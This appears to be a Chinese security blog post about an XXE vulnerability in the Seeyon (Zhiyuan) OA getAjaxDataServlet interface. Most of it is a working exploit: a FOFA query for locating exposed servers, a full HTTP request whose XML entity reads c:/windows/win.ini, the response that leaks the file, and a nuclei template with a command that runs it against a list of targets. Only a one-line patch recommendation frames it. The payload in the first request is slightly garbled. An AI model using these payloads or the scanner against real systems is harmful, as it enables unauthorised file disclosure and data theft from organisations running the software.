致远OA getAjaxDataServlet XXE漏洞

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

漏洞影响

致远互联-OA

漏洞描述

致远互联协同运营平台，打造企业数智运营中枢，助力企业实现办公业务、财务、管理与运营的一体化运作，帮助企业加强链接、用好数据做好决策，全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。

FOFA搜索语句

app="致远互联-OA"

漏洞复现

向靶场发送如下数据包，查看C://windows//win.ini文件内容


POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

响应内容如下


HTTP/1.1 200
Connection: close
Content-Length: 1007
Content-Type: text/html;charset=utf-8
Date: Mon, 08 Jan 2024 04:25:57 GMT
Server: SY8045
Set-Cookie: JSESSIONID=0DA12779FEE71DF69052322AD81A3096; Path=/seeyon; HttpOnly








<!DOCTYPE html>
<html>
<head>
<title>异常处理页面</title>


<link rel="stylesheet" href="/seeyon/common/all-min.css?V=V8_0_200613_25650">
<script type="text/javascript">
if(parent && parent.errorHandle)
    parent.errorHandle("");
</script>
</head>
<body class="page_color">

    提示信息：<BR/>系统级错误，请检查localhost.log查看详细异常堆栈：<br/>com.kg.commons.KgException [err=[KgCommonsError [code=100000,msg=系统异常]]]
 invoke param:[KgSignatureInfo [textinfo=KgTextInfo [signText=null, fontName=宋体, fontColor=18, fontSize=12, fontStyle=0, posType=CENTER_MIDDLE, breakWord=true], waterImg=null, elemId=null, left=0, top=0], [KgProtectedData [fieldName=id, fieldDesc=caption, fieldValue=; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
, encodeValue=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0Cltmb250c10KW2V4dGVuc2lvbnNdClttY2kgZXh0ZW5zaW9uc10KW2ZpbGVzXQpbTWFpbF0KTUFQST0xCg==]]]


</body>
</html>

返回信息中包含文件内容，漏洞复现成功。

nuclei poc

poc文件内容如下


id: seeyon-getAjaxDataServlet-xxe

info:
  name: 致远OA getAjaxDataServlet XXE漏洞
  author: fgz
  severity: critical
  description: 致远互联协同运营平台，打造企业数智运营中枢，助力企业实现办公业务、财务、管理与运营的一体化运作，帮助企业加强链接、用好数据做好决策，全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。
  metadata:
    max-request: 1
    fofa-query: app="致远互联-OA"
    verified: true
requests:
  - raw:
      - |+
        POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        
        S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'for 16-bit app')"

运行POC

nuclei.exe -t mypoc/致远/seeyon-getAjaxDataServlet-xxe.yaml -l data/致远互联-OA.txt

修复建议

升级到最新版本或者打上官方发布的补丁。

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=170